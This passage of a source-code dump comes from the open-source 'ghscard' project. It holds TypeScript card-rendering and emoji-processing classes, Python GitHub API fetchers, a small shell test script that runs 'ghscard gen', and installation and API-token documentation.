{\n const tagLabel = this.createAnchorElement(\n `${this.htmlUrl}/releases`,\n `ui ${this.releaseTagColor} ${this.versionLabelSize} label`\n );\n tagLabel.title = \"Latest tag\";\n tagLabel.appendChild(this._doc.createTextNode(this.getCardData(\"latest_tag\")));\n tagLabel.setAttribute(\"data-tooltip\", `${this.getCardData(\"tags_count\")} releases`);\n tagLabel.setAttribute(\"data-inverted\", \"\");\n tagLabel.setAttribute(\"data-position\", \"bottom center\");\n\n return tagLabel;\n }\n\n private createLanguageLabel(): HTMLElement {\n if (!this.language) {\n return null;\n }\n\n const languageElement = this.createElement(\"div\", `ui ${this.getColor()} label`);\n languageElement.title = \"Language\";\n languageElement.appendChild(this._doc.createTextNode(this.language));\n\n return languageElement;\n }\n\n private createStars(): HTMLElement {\n const icon = this.createElement(\"i\", \"star black icon\");\n icon.title = \"Stargazers\";\n\n let stargazersLink: HTMLElement;\n if (this.htmlUrl) {\n stargazersLink = this.createAnchorElement(`${this.htmlUrl}/stargazers`);\n } else {\n stargazersLink = this._doc.createElement(\"div\");\n }\n stargazersLink.title = \"Stargazers count\";\n stargazersLink.appendChild(icon);\n stargazersLink.appendChild(this._doc.createTextNode(this.getCardData(\"stargazers_count\")));\n\n return stargazersLink;\n }\n\n private createForks(): HTMLElement {\n const icon = this.createElement(\"i\", \"fork black icon\");\n icon.title = \"Forks\";\n\n let forksLink: HTMLElement;\n if (this.htmlUrl) {\n forksLink = this.createAnchorElement(`${this.htmlUrl}/network`);\n } else {\n forksLink = this._doc.createElement(\"div\");\n }\n forksLink.title = \"Forks count\";\n forksLink.appendChild(icon);\n forksLink.appendChild(this._doc.createTextNode(this.getCardData(\"forks_count\")));\n\n return forksLink;\n }\n\n private colorMap: object;\n}\n" }, { "alpha_fraction": 0.6175794005393982, "alphanum_fraction": 0.6194201707839966, "avg_line_length": 
26.506328582763672, "blob_id": "1c157e7725b12f44fd53821853dc0a390126fb85", "content_id": "f10705fba2c424e24622c89b1f20daa4675e6434", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2173, "license_type": "permissive", "max_line_length": 116, "num_lines": 79, "path": "/src/emoji.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { Emoji } from \"./const\";\n\nexport interface EmojiProcessorInterface {\n processEmoji(text: string): string\n}\n\nclass AbstractEmojiProcessor implements EmojiProcessorInterface {\n public processEmoji(_text: string): string {\n throw new Error(\"not implemented\");\n }\n\n protected readonly _regexpEmoji = new RegExp(\":[a-zA-Z0-9_-]+:\", \"gm\");\n}\n\nclass EmojiNop extends AbstractEmojiProcessor {\n public processEmoji(text: string): string {\n return text;\n }\n}\n\nclass EmojiRemover extends AbstractEmojiProcessor {\n public processEmoji(text: string): string {\n return text.replace(this._regexpEmoji, \"\");\n }\n}\n\nclass EmojiResolver extends AbstractEmojiProcessor {\n constructor(private emojiMapping) {\n super();\n }\n\n public processEmoji(text: string): string {\n const matchList: RegExpMatchArray = text.match(this._regexpEmoji);\n\n if (matchList === null) {\n return text;\n }\n\n const replaceMapping = new Object();\n\n for (const emojiText of matchList) {\n const emojiId = emojiText.substr(1, emojiText.length - 2);\n const tag = `<img src='${this.emojiMapping[emojiId]}' width='${Emoji.WIDTH}' height='${Emoji.HEIGHT}'>`;\n replaceMapping[emojiText] = tag;\n }\n\n for (const emojiText in replaceMapping) {\n text = text.replace(new RegExp(emojiText, \"g\"), replaceMapping[emojiText]);\n }\n\n return text;\n }\n}\n\nexport class EmojiProcessorFactory {\n public static create(processorType: string, emojiMapping: object): EmojiProcessorInterface {\n console.debug(`emoji processor type: ${processorType}`);\n\n if (processorType === 
null) {\n return new EmojiResolver(emojiMapping);\n }\n\n if (processorType === \"nop\") {\n return new EmojiNop();\n }\n\n if (processorType === \"remove\") {\n return new EmojiRemover();\n }\n\n if (processorType === \"resolve\") {\n return new EmojiResolver(emojiMapping);\n }\n\n console.error(`unknown emoji processor type: ${processorType}`);\n\n return new EmojiNop();\n }\n}\n" }, { "alpha_fraction": 0.6530333757400513, "alphanum_fraction": 0.6540558934211731, "avg_line_length": 36.13924026489258, "blob_id": "1f3801e9e29b1527d05c89eafb0b7fd93ab0f1ba", "content_id": "97310f96c3f212b14c21a2dc2ec2d31396a0f592", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2934, "license_type": "permissive", "max_line_length": 99, "num_lines": 79, "path": "/ghscard/fetcher/_user.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport collections\nfrom multiprocessing.pool import AsyncResult # noqa\nfrom typing import Any, Counter, Dict, List, Optional, Union # noqa\n\nfrom .._const import DATETIME_FORMAT, CardType, CommonCardKey\nfrom ._base import AbstractCardDataFetcher, CardData\nfrom ._common import dump_organization, to_chart_data\n\n\ndef ghc_starred_count_helper(ghc_client) -> Dict[str, int]:\n return {\"stars\": ghc_client.starred_count}\n\n\ndef ghc_organizations_helper(user) -> Dict[str, List[Dict[str, str]]]:\n return {\"organizations\": [dump_organization(organization) for organization in user.get_orgs()]}\n\n\ndef ghc_languages_helper(user) -> Dict[str, Dict[str, list]]:\n language_mapping = collections.Counter() # type: Counter\n\n for repo in user.get_repos():\n language_mapping[repo.language] += 1\n\n try:\n del language_mapping[None]\n except KeyError:\n pass\n\n return {\"languages\": to_chart_data(language_mapping, 5)}\n\n\nclass UserCardDataFetcher(AbstractCardDataFetcher):\n @property\n def 
type(self) -> str:\n return CardType.USER\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching user data: id={self.id}\")\n\n card_data = super().fetch()\n user = self._pygh_client.get_user(self.id)\n\n thread_list = [\n self._pool.apply_async(ghc_starred_count_helper, args=[self._ghc_client]),\n self._pool.apply_async(ghc_organizations_helper, args=[user]),\n self._pool.apply_async(ghc_languages_helper, args=[user]),\n ] # type: List[AsyncResult]\n\n # this will raise UnknownObjectException when failed to get data\n card_data[\"profile_name\"] = user.name\n\n card_data[CommonCardKey.AVATAR_URL] = user.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.USER\n card_data[CommonCardKey.CREATED_AT] = user.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = user.bio\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(user.bio)\n card_data[CommonCardKey.HTML_URL] = user.html_url\n card_data[CommonCardKey.NAME] = self.id\n card_data[CommonCardKey.UPDATED_AT] = user.updated_at.strftime(DATETIME_FORMAT)\n card_data[\"blog\"] = user.blog\n card_data[\"company\"] = user.company\n card_data[\"email\"] = user.email\n card_data[\"followers\"] = user.followers\n card_data[\"following\"] = user.following\n card_data[\"location\"] = user.location\n card_data[\"public_gists\"] = user.public_gists\n card_data[\"public_repos\"] = user.public_repos\n\n for i, thread in enumerate(thread_list):\n thead_id = \"thread {:d}/{:d}\".format(i + 1, len(thread_list))\n self._logger.debug(\"wait for {}\".format(thead_id))\n card_data.update(thread.get())\n self._logger.debug(\"complete {}\".format(thead_id))\n\n return card_data\n" }, { "alpha_fraction": 0.62848299741745, "alphanum_fraction": 0.62848299741745, "avg_line_length": 15.149999618530273, "blob_id": "98f47e7d14b9f4bc93ceb1797b8f406ad788c689", "content_id": "11867dc091663ac8cf0753fb8a1921d332ec6630", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "Shell", "length_bytes": 323, "license_type": "permissive", "max_line_length": 56, "num_lines": 20, "path": "/test/html/fetch_gh_data_test.sh", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\noutput_dir=\"data\"\nbase_command=\"ghscard gen\"\ntargets=(\n \"thombashi\"\n \"kentcdodds\"\n \"kennethreitz\"\n\n \"angular\"\n\n \"angular/angular\"\n \"pallets/flask\"\n \"Microsoft/TypeScript\"\n \"thombashi/null\"\n)\n\ncommand=\"${base_command} -o ${output_dir} ${targets[@]}\"\necho \"${command}\"\n${command}\n" }, { "alpha_fraction": 0.5703004598617554, "alphanum_fraction": 0.5724191069602966, "avg_line_length": 29.541175842285156, "blob_id": "c117c12e60befb8f2299f20e28ca6d1043246a1f", "content_id": "b90d1e0fa9aa43ef4c279e086dfb0cb866ad2d6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5192, "license_type": "permissive", "max_line_length": 99, "num_lines": 170, "path": "/ghscard/_github_client.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport re\nfrom typing import Dict\n\nimport msgfy\nimport retryrequests\nimport typepy\nfrom github.GithubException import RateLimitExceededException\n\nfrom ._const import MAX_PER_PAGE\nfrom ._emoji import EmojiParser\nfrom ._stopwatch import stopwatch\n\n\nclass GitHubClient:\n @property\n def emojis(self) -> Dict[str, str]:\n if self.__emojis: # type: ignore\n return self.__emojis # type: ignore\n\n self.__emojis = self.get(\"/emojis\")\n\n return self.__emojis\n\n @property\n def emoji_parser(self) -> EmojiParser:\n if self.__emoji_parser: # type: ignore\n return self.__emoji_parser # type: ignore\n\n self.__emoji_parser = EmojiParser(self.emojis)\n\n return self.__emoji_parser\n\n @property\n def repo(self):\n if self.__repos:\n return self.__repos\n\n self.__repos = self.get(\n f\"/repos/{self.__github_id:s}\",\n headers={\"accept\": \"application/vnd.github.drax-preview+json\"},\n )\n # get license: https://developer.github.com/v3/licenses/\n\n return self.__repos\n\n @property\n def branches_count(self) -> int:\n return self.__get_count(\"branches\")\n\n @property\n def contributors_count(self) -> int:\n return self.__get_count(\"contributors\")\n\n @property\n def pulls_count(self) -> int:\n return self.__get_count(\"pulls\")\n\n @property\n def tags_count(self) -> int:\n return self.__get_count(\"tags\")\n\n @property\n def starred_count(self) -> int:\n return self.__get_count(\"starred\")\n\n def __init__(self, logger, github_id, access_token=None):\n self._logger = logger\n self.__github_id = github_id\n self.__access_token = access_token\n\n self.__emojis = None\n self.__emoji_parser = None\n self.__repos = None\n\n def get(self, operation: str, headers: dict = None, params: dict = None) -> dict:\n if not headers:\n headers = {}\n\n if not params:\n params = {}\n\n if typepy.is_not_null_string(self.__access_token):\n headers[\"authorization\"] = f\"token {self.__access_token:s}\"\n\n 
api_url = f\"https://api.github.com{operation:s}\"\n response = retryrequests.get(api_url, headers=headers, params=params)\n self._logger.debug(f\"API called: {response.url}\")\n\n try:\n response_json = response.json()\n except ValueError:\n return {}\n\n try:\n message = response_json.get(\"message\")\n except AttributeError:\n return response_json\n\n if message:\n if re.search(\".* list is too large to list .* via the API\", message):\n raise OSError(message)\n\n if response.status_code == 403 and re.search(\"^API rate limit exceeded for \", message):\n raise RateLimitExceededException(status=response.status_code, data=message)\n\n return response_json\n\n def get_page(self, operation: str, page) -> dict:\n return self.get(operation, params={\"per_page\": str(MAX_PER_PAGE), \"page\": page})\n\n def _get_branches(self, page) -> dict:\n # https://developer.github.com/v3/repos/branches/\n return self.get_page(f\"/repos/{self.__github_id:s}/branches\", page=page)\n\n def _get_contributors(self, page) -> dict:\n return self.get_page(f\"/repos/{self.__github_id:s}/contributors\", page=page)\n\n def _get_pulls(self, page) -> dict:\n # https://developer.github.com/v3/pulls/\n return self.get_page(f\"/repos/{self.__github_id:s}/pulls\", page=page)\n\n def _get_tags(self, page) -> dict:\n # https://developer.github.com/v3/git/tags/\n return self.get_page(f\"/repos/{self.__github_id:s}/tags\", page=page)\n\n def _get_releases(self, page) -> dict:\n # https://developer.github.com/v3/repos/releases/\n return self.get_page(f\"/repos/{self.__github_id:s}/releases\", page=page)\n\n def _get_starred(self, page) -> dict:\n return self.get_page(f\"/users/{self.__github_id:s}/starred\", page=page)\n\n def __get_count(self, param_name: str) -> int:\n attr_template = \"__{:s}\"\n method_template = \"_get_{:s}\"\n\n try:\n count = getattr(self, attr_template.format(param_name))\n if count:\n return count\n except AttributeError:\n pass\n\n total_count = 0\n page = 1\n\n with 
stopwatch(self._logger, f\"get {param_name:s}\"):\n while True:\n method_name = method_template.format(param_name)\n with stopwatch(self._logger, f\"{method_name:s} page {page:d}\"):\n try:\n subtotal_count = len(getattr(self, method_name)(page))\n except OSError as e:\n self._logger.debug(msgfy.to_debug_message(e))\n # total_count = None\n break\n\n if not subtotal_count:\n break\n\n total_count += subtotal_count\n page += 1\n\n setattr(self, attr_template.format(param_name), total_count)\n\n return total_count\n" }, { "alpha_fraction": 0.6269744634628296, "alphanum_fraction": 0.6275820136070251, "avg_line_length": 25.126983642578125, "blob_id": "b8ff68511b8116553b645a2a9f295151aa26950f", "content_id": "6eac6349c7d7063743d83af3c3fbaee746cd6df7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1646, "license_type": "permissive", "max_line_length": 87, "num_lines": 63, "path": "/ghscard/fetcher/_base.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport abc\nimport datetime\nimport multiprocessing\nfrom typing import Dict, List, Union\n\nimport github\n\nfrom .._const import CARD_DATA_VERSION, DATETIME_FORMAT, CommonCardKey, Result\nfrom .._github_client import GitHubClient\nfrom ._common import ChartData\n\n\nEmojiMap = Dict[str, str]\nTopics = List[str]\nCardData = Dict[str, Union[int, str, None, ChartData, EmojiMap, Topics]]\n\n\nclass AbstractCardDataFetcher(metaclass=abc.ABCMeta):\n @abc.abstractproperty\n def type(self) -> str: # pragma: no cover\n pass\n\n @property\n def id(self) -> str:\n return self.__id\n\n def __init__(\n self, pygh_client: github.Github, ghc_client: GitHubClient, id: str, logger\n ) -> None:\n self.__id = id\n self._logger = logger\n\n self._pygh_client = pygh_client\n self._ghc_client = ghc_client\n\n self._pool = multiprocessing.Pool(processes=4)\n\n def fetch(self) -> CardData:\n return {\n CommonCardKey.ID: self.id,\n CommonCardKey.FETCHD_AT: datetime.datetime.now().strftime(DATETIME_FORMAT),\n CommonCardKey.VERSION: CARD_DATA_VERSION,\n CommonCardKey.RESULT: Result.SUCCESS,\n }\n\n def terminate(self) -> None:\n self._pool.terminate()\n\n def _get_emoji_mapping(self, text) -> EmojiMap:\n try:\n emoji_list = self._ghc_client.emoji_parser.parse(text)\n except ValueError:\n emoji_list = []\n\n emoji_mapping = {}\n for emoji in emoji_list:\n emoji_mapping[emoji] = self._ghc_client.emoji_parser.get_url(emoji)\n\n return emoji_mapping\n" }, { "alpha_fraction": 0.6469465494155884, "alphanum_fraction": 0.6488549709320068, "avg_line_length": 33.86666488647461, "blob_id": "f90584f535ccb7d1bdd3ae1b11027010cb040891", "content_id": "341917ad35850d9b7ac19167b2b687cc5969b56f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 524, "license_type": "permissive", "max_line_length": 90, "num_lines": 15, "path": "/docs/pages/usage/advanced_usage.rst", 
"repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Advanced Usage\n==========================\n\nGitHub API Token Setting\n--------------------------------------\nYou can set GitHub API token via ``ghscard configure`` command to workaround \n`GitHub API rate limit <//developer.github.com/v3/#rate-limiting>`__.\nYou might exceed GitHub API rate limit when creating card data by ``ghscard gen`` command.\nGit Hub API token can create at https://github.com/settings/tokens/new\n\n::\n\n $ ghscard configure\n GitHub API Personal Access Token: <token>\n Output Directory Path [.]:\n\n" }, { "alpha_fraction": 0.5826271176338196, "alphanum_fraction": 0.5868644118309021, "avg_line_length": 26.764705657958984, "blob_id": "5171b2051146ac4c6aa777ab816ba9d2d78065f5", "content_id": "654d54eb7d483ee27b5323a01dc198afe7bfff4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 472, "license_type": "permissive", "max_line_length": 119, "num_lines": 17, "path": "/docs/pages/introduction/installation.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "CLI Tool Installation\n====================================\nInstall ``ghscard`` CLI tool from `PyPI <//pypi.python.org/pypi>`__ via\n`pip <//pip.pypa.io/en/stable/installing/>`__ (Python package manager) command.\n\n::\n\n pip install ghscard\n\n\nDependencies\n====================================\n\nCLI Tool Dependencies\n----------------------\n- Python 3.6+\n- `Python package dependencies (automatically installed) <https://github.com/thombashi/ghscard/network/dependencies>`__\n" }, { "alpha_fraction": 0.6403310894966125, "alphanum_fraction": 0.6425884366035461, "avg_line_length": 21.525423049926758, "blob_id": "0a2dc957a37cf26f54677f1a646320af9c29d2f0", "content_id": "2b62d072e511b2c060da0ce7fbacdf2c342eed1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, 
"license_type": "permissive", "max_line_length": 81, "num_lines": 59, "path": "/docs/make_readme.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport sys\n\nfrom readmemaker import ReadmeMaker\n\n\nPROJECT_NAME = \"ghscard\"\nOUTPUT_DIR = \"..\"\n\n\ndef write_quickstart(maker):\n maker.set_indent_level(0)\n maker.write_introduction_file(\"quickstart.txt\")\n\n maker.inc_indent_level()\n maker.write_chapter(\"For more information\")\n maker.write_lines(\n [\n \"More examples are available at \",\n f\"https://{PROJECT_NAME:s}.rtfd.io/en/latest/pages/usage/index.html\",\n ]\n )\n\n\ndef main():\n maker = ReadmeMaker(\n PROJECT_NAME,\n OUTPUT_DIR,\n is_make_toc=True,\n project_url=f\"https://github.com/thombashi/{PROJECT_NAME}\",\n )\n\n maker.write_chapter(\"Summary\")\n maker.write_introduction_file(\"summary.txt\")\n maker.write_introduction_file(\"badges.txt\")\n\n maker.write_chapter(\"Demo\")\n maker.write_introduction_file(\"demo.txt\")\n maker.write_introduction_file(\"installation.rst\")\n\n write_quickstart(maker)\n\n maker.write_file(maker.doc_page_root_dir_path.joinpath(\"environment.rst\"))\n\n maker.write_chapter(\"Documentation\")\n maker.write_lines([f\"https://{PROJECT_NAME:s}.rtfd.io/\"])\n\n maker.write_file(maker.doc_page_root_dir_path.joinpath(\"sponsors.rst\"))\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n" }, { "alpha_fraction": 0.598978579044342, "alphanum_fraction": 0.5994892716407776, "avg_line_length": 28.223880767822266, "blob_id": "2fb61c37949ac7b8e0e14d332f5b3e25b2b499ee", "content_id": "f5027cb8fdffe2557c37c0dd7e49882939480be2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 9790, "license_type": "permissive", "max_line_length": 100, "num_lines": 335, "path": "/src/card/base.ts", "repo_name": "thombashi/ghscard", 
"src_encoding": "UTF-8", "text": "import { CARD_ELEMENT_ID, Margin, DEFAULT_SEMANTIC_UI_CSS_URL, JsUrl } from \"../const\";\nimport { EmojiProcessorInterface } from \"../emoji\";\nimport { DateTimeKey, UiColor, UiSize } from \"../types\";\nimport { CardGeratorInterface } from \"./interface\";\n\nimport dayjs from \"dayjs\";\n\nexport class AbstractCardGerator implements CardGeratorInterface {\n protected get headerSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n throw Error(\"not implemented\");\n }\n\n protected get infoSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get popupSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get color(): string {\n return this._color;\n }\n\n protected get iframeWidth(): number {\n return this._iframeWidth;\n }\n\n protected get cardWidth(): number {\n return this.iframeWidth - Margin.FRAME * 2;\n }\n\n constructor(\n protected _doc: Document,\n protected _cardData: object,\n private _iframeWidth: number,\n private _color: string,\n protected _emojiProcessor: EmojiProcessorInterface\n ) {}\n\n public createCard(uniqueFrameNumber: number): HTMLIFrameElement {\n const cardFrame = this._doc.createElement(\"iframe\");\n\n cardFrame.id = `__ghscard_iframe${uniqueFrameNumber}__`;\n cardFrame.scrolling = \"no\";\n cardFrame.width = `${this.iframeWidth}px`;\n cardFrame.style.visibility = \"hidden\";\n cardFrame.style.border = \"0px\";\n // cardFrame.style.overflow = \"visible\";\n // this.appendCardCss(cardFrame.id);\n\n const iframeBody = this._doc.createElement(\"body\");\n iframeBody.appendChild(this.createCardElement());\n iframeBody.appendChild(this.createScriptElement());\n\n const html = this.createHeaderElement().outerHTML + iframeBody.outerHTML;\n (<any>cardFrame).srcdoc = html;\n\n return cardFrame;\n }\n\n protected isDisplayChart(): boolean {\n return false;\n }\n\n protected isDisplayCommitChart(): boolean {\n return false;\n }\n\n 
private createCardElement(): HTMLElement {\n const card: HTMLElement = this.createElement(\"div\", `ui ${this.getColor()} card`);\n card.id = CARD_ELEMENT_ID;\n card.style.margin = `${Margin.CARD_CONTENT}px`;\n card.appendChild(this.createCardContent());\n\n const extraCardContent = this.createExtraCardContent();\n if (extraCardContent !== null) {\n card.appendChild(extraCardContent);\n }\n\n return card;\n }\n\n protected getColor(): UiColor {\n throw Error(\"not implemented\");\n }\n\n protected getScript(): string {\n throw Error(\"not implemented\");\n }\n\n protected createCardHeader(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected createCardContent(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected createExtraCardContent(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n private createHeaderElement(): HTMLElement {\n const header = this._doc.createElement(\"header\");\n header.appendChild(this.createScriptSrcElement(JsUrl.JQUERY));\n header.appendChild(\n this.createStyleSheetLinkElement(this._doc, DEFAULT_SEMANTIC_UI_CSS_URL)\n );\n header.appendChild(this.createScriptSrcElement(JsUrl.SEMANTIC_UI));\n\n if (this.isDisplayChart()) {\n header.appendChild(this.createScriptSrcElement(JsUrl.MOMENT));\n header.appendChild(this.createScriptSrcElement(JsUrl.CHART));\n header.appendChild(this.createScriptSrcElement(JsUrl.PLEASE));\n }\n\n header.appendChild(\n this.createCssElement(this._doc, `.ui.card { width: ${this.cardWidth}px; }`)\n );\n\n return header;\n }\n\n private createCssElement(doc: Document, cssText: string) {\n const css = doc.createElement(\"style\");\n css.type = \"text/css\";\n css.appendChild(doc.createTextNode(cssText));\n\n return css;\n }\n\n private createStyleSheetLinkElement(doc: Document, href: string) {\n const link = doc.createElement(\"link\");\n link.rel = \"stylesheet\";\n link.href = href;\n\n return link;\n }\n\n protected createElement(tagName: string, className: string): 
HTMLElement {\n const element: HTMLElement = this._doc.createElement(tagName);\n element.className = className;\n\n return element;\n }\n\n protected createAnchorElement(href: string, className: string = null): HTMLAnchorElement {\n const element: HTMLAnchorElement = this._doc.createElement(\"a\");\n if (className) {\n element.className = className;\n }\n element.href = href;\n element.target = \"__top\";\n\n return element;\n }\n\n protected createImageElement(src: string, className: string = null): HTMLImageElement {\n const element: HTMLImageElement = this._doc.createElement(\"img\");\n if (className) {\n element.className = className;\n }\n element.src = src;\n\n return element;\n }\n\n protected createLabelElement(text: string, size: UiSize): HTMLElement {\n const label = this.createElement(\"div\", `ui circular horizontal ${size} label`);\n\n label.style.marginLeft = `${Margin.LABEL}px`;\n label.appendChild(this._doc.createTextNode(text));\n\n return label;\n }\n\n protected createElementWithChild<T>(className: string, childNodeArray: Array<T>): HTMLElement {\n const element = this.createElement(\"div\", className);\n\n Array.prototype.forEach.call(childNodeArray, (childNode) => {\n if (childNode) {\n element.appendChild(childNode);\n }\n });\n\n return element;\n }\n\n protected createContentElement<T>(childNodeArray: Array<T>): HTMLElement {\n const content = this.createElement(\"div\", \"content\");\n\n Array.prototype.forEach.call(childNodeArray, (childNode) => {\n if (childNode) {\n content.appendChild(childNode);\n }\n });\n\n return content;\n }\n\n protected createColumn(element: HTMLElement, wide = \"\"): HTMLElement {\n const column = this.createElement(\"div\", `${wide} column`);\n column.appendChild(element);\n\n return column;\n }\n\n protected createDescription(text: string): HTMLElement {\n if (!text) {\n return null;\n }\n\n const descElement = this.createElement(\"div\", \"description\");\n descElement.innerHTML = 
this._emojiProcessor.processEmoji(this.escapeHtml(text));\n\n return descElement;\n }\n\n protected createDateTimeElement(\n key: DateTimeKey,\n prefix: string,\n iconName: string,\n className: string\n ): HTMLElement {\n const datetimeValue = this._cardData[key];\n if (!datetimeValue) {\n return null;\n }\n\n const datetimeElement: HTMLElement = this.createElement(\"div\", className);\n datetimeElement.appendChild(this.createElement(\"i\", iconName));\n datetimeElement.appendChild(\n this.createContentElement([\n this._doc.createTextNode(`${prefix} ${dayjs(datetimeValue).format(\"YYYY-MM-DD\")}`),\n ])\n );\n\n return datetimeElement;\n }\n\n protected createPopup(): HTMLElement {\n const popup = this.createElement(\"div\", \"ui special popup\");\n popup.appendChild(this.createPopupInfoList());\n\n return popup;\n }\n\n protected createPopupInfoList(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n private createScriptElement(): HTMLElement {\n const scriptContent = [\"$(window).on(\\\"load\\\", function() {\", this.getScript(), \"});\"].join(\n \"\\n\"\n );\n\n const scriptElement = this._doc.createElement(\"script\");\n scriptElement.innerHTML = scriptContent;\n\n return scriptElement;\n }\n\n private createScriptSrcElement(src: string, charset = null) {\n const script = this._doc.createElement(\"script\");\n script.src = src;\n\n if (charset) {\n script.charset = charset;\n }\n\n return script;\n }\n\n protected _createEmailElement(emailAddress: string, className: string): HTMLElement {\n if (!emailAddress) {\n return null;\n }\n\n const mailLink = this.createAnchorElement(`mailto:${emailAddress}`, \"content\");\n mailLink.appendChild(this._doc.createTextNode(this.escapeHtml(emailAddress)));\n\n const email = this.createElement(\"div\", className);\n email.title = \"email address\";\n email.appendChild(this.createElement(\"i\", \"mail icon\"));\n email.appendChild(mailLink);\n\n return email;\n }\n\n protected escapeHtml(text: string): string {\n 
return text\n .replace(/&/g, \"&amp;\")\n .replace(/</g, \"&lt;\")\n .replace(/>/g, \"&gt;\")\n .replace(/\"/g, \"&quot;\")\n .replace(/'/g, \"&#39;\");\n }\n\n protected toUiColor(color: string): UiColor {\n const validColorArray = [\n \"red\",\n \"orange\",\n \"yellow\",\n \"olive\",\n \"green\",\n \"teal\",\n \"blue\",\n \"violet\",\n \"purple\",\n \"pink\",\n \"brown\",\n \"grey\",\n \"black\",\n ];\n const defaultColor = \"grey\";\n\n if (color == null) {\n return defaultColor;\n }\n\n color = color.toLowerCase();\n if (validColorArray.indexOf(color) >= 0) {\n return validColorArray[color];\n }\n\n console.warn(`unexpected color: (${color})`);\n\n return defaultColor;\n }\n}\n" }, { "alpha_fraction": 0.583178699016571, "alphanum_fraction": 0.583178699016571, "avg_line_length": 22.434782028198242, "blob_id": "5acfcedbb6d0c5daaa18867e3457d5a6d861a21c", "content_id": "8531a6f90c2e38c5b2f3cca90d5a808b0299bd44", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1617, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/src/card/repository/tiny.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class TinyRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"small\";\n }\n\n protected get infoSize(): UiSize {\n return \"tiny\";\n }\n\n protected get popupSize(): UiSize {\n return \"mini\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"tiny\";\n }\n\n protected get topicSize(): UiSize {\n return \"mini\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Tiny.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Tiny.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): 
number {\n return ChartSize.Pie.Tiny.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Tiny.TITLE_FONT_SIZE;\n }\n\n protected get chartTickFontSize(): number {\n return ChartSize.Line.Tiny.TICK_FONT_SIZE;\n }\n\n protected isDisplayChart(): boolean {\n if (this.chartDisplay === \"block\") {\n return true;\n }\n\n return false;\n }\n\n protected createCardInfoList(): HTMLElement {\n return null;\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n repo_homepage: true,\n wiki: true,\n license: true,\n created_at: true,\n },\n this.popupSize\n );\n }\n}\n" }, { "alpha_fraction": 0.4034496545791626, "alphanum_fraction": 0.4034496545791626, "avg_line_length": 32.85234832763672, "blob_id": "dc249eff77e98d4bb8166881bf4eb4536183f777", "content_id": "2dbc41e9b7ff6153dec8a436c0cf59055ab042cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5044, "license_type": "permissive", "max_line_length": 94, "num_lines": 149, "path": "/src/factory.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeratorInterface } from \"./card/interface\";\nimport { MediumOrgCardGerator } from \"./card/organization/medium\";\nimport { SmallOrgCardGerator } from \"./card/organization/small\";\nimport { TinyOrgCardGerator } from \"./card/organization/tiny\";\nimport { MediumRepoCardGerator } from \"./card/repository/medium\";\nimport { SmallRepoCardGerator } from \"./card/repository/small\";\nimport { TinyRepoCardGerator } from \"./card/repository/tiny\";\nimport { MediumUserCardGerator } from \"./card/user/medium\";\nimport { SmallUserCardGerator } from \"./card/user/small\";\nimport { TinyUserCardGerator } from \"./card/user/tiny\";\nimport { EmojiProcessorInterface } from \"./emoji\";\nimport { CardStyle, CardType, ElementDisplay } from 